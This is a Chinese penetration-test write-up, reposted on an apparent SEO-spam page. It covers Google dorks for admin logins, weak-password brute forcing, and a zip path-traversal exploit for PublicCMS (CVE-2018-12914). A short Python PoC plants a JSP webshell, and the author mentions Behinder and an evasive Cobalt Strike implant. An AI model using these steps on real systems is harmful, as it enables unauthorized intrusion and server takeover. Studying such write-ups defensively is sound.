当前位置: 首页 > news >正文

广告公司企业介绍北京seo怎么优化

广告公司企业介绍,北京seo怎么优化,购物网站开发文献综述,网页设计毕业论文免费信息收集 某企业提供信息:企业官网的真实外网ip,内网ip 企业官网比较硬,从控股超过51%的子公司入手 通过企查查找到一堆控股高的子公司,通过ICP/IP地址/域名信息备案管理系统查找子公司官网,收集二级域名。通过google…

信息收集

某企业提供信息:企业官网的真实外网ip,内网ip

企业官网比较硬,从控股超过51%的子公司入手

通过企查查找到一堆控股高的子公司,通过ICP/IP地址/域名信息备案管理系统查找子公司官网,收集二级域名。通过googlehacking查找登录页面,发现一个管理后台登录页面

site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system
site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend
site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录

登录页面没有任何验证码,bp进行弱密码爆破

admin/admin

登录后台发现是一个publiccms,可以查看web下的静态文件和执行sql,查找框架相关漏洞

根据数据目录可以知道上传的文件目录不在web目录下,所以直接上传jsp木马无效

在这里插入图片描述

CVE-2018-12914

漏洞编号:CVE-2018-12914

漏洞危害:用户通过在压缩文件中构造包含有特定文件名称的压缩文件时,在进行解压时,会导致跨目录任意写入文件漏洞的攻击。

影响版本:PublicCMS V4.0.20180210

漏洞加固:更新到最新版本 。对比补丁,发现在获取压缩文件中的文件名字时,如果其中含有”…”时则被替换为空。

漏洞原因

controller目录下\admin\cms\CmsWebFileAdminController.java代码里的uzip调用方式上出现了漏洞,该系统采用的是dounzip的方式去调用,dounzip是解压缩常用到的,导致我们可以构造特殊的文件名,来将我们的脚本木马上传到网站任意目录下。

该代码通过获取targetPath的上传路径值与压缩文件里的名字进行自动拼接,在拼接的这个过程当中,…/ 可以对目录进行跨站。网站漏洞产生最根本的原因就是在处理这个压缩文件的时候并没有对压缩里的文件名进行判断与过滤,导致可以使用特殊的文件名进行定义,并传入到服务器后端执行代码,通过上传JSP木马后门,可以直接对服务器进行控制,危害性较高。

getshell

poc

import zipfileif __name__ == "__main__":try:binary = 'coelak'     //木马内容zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)info = zipfile.ZipInfo("test.zip")zipFile.writestr("../../../../../../cmd.jsp", binary)zipFile.close()except IOError as e:raise e

构造一个zip压缩文件,里面的文件名为

../../../../../../../../工作站目录/webapps/publiccms/cccaaacoleak.jsp

上传该zip文件,上传和解压,cccaaacoleak.jsp会写入在publiccms目录下。成功getshell,连接冰蝎

然后上传免杀cs马,进行内网渗透了。

http://www.shuangfujiaoyu.com/news/44539.html

相关文章:

  • 安装wordpress主题后 显示乱码 怎么解决廊坊网络推广优化公司
  • 百度网站置顶怎么做详细描述如何进行搜索引擎的优化
  • 外国网站 游戏设定图淘宝seo优化是什么
  • 网站建设哪家好知道百度指数数据分析
  • 企业网站源码搜一品资源晋城seo
  • 做网站开发需要考什么证书私域流量运营管理
  • 做网站网页排版错误太原做网站推广的公司
  • wordpress 微博】seo基础知识
  • qq空间做淘宝客网站广州seo教程
  • 个人网站备案核验单百度指数查询平台
  • 集美网站建设代写软文
  • 做类似淘宝的网站设计需要什么公司营销策划方案
  • wordpress 站长工具乐事薯片软文推广
  • ps做网站编排金昌网站seo
  • 毕设做网站怎么弄代码设计关键词优化到首页怎么做到的
  • 企业登录官网惠州seo公司
  • WordPress怎么更改主题名称东莞网络推广及优化
  • 做一个网站分析应该怎么做自己可以做网站推广吗
  • 游戏网页设计作品欣赏苏州优化seo
  • 做网站大概多少百度网站
  • 维护网站建设空间出租深圳推广优化公司
  • 中国建筑设计作品网站网络推销
  • 南做网站杭州网站优化效果
  • 网站的二级页面在哪里做市场调研方案怎么写
  • 做水处理药剂的公司网站百度怎么优化排名
  • 营销型类型网站有哪些类型深圳关键词排名seo
  • 网站引导动画怎么做天津百度推广排名
  • 东坑网站建设推广优化网站排名
  • 重庆中国建设银行招聘信息网站搜索引擎营销的方法
  • 服装设计公司排名前十强百度快速seo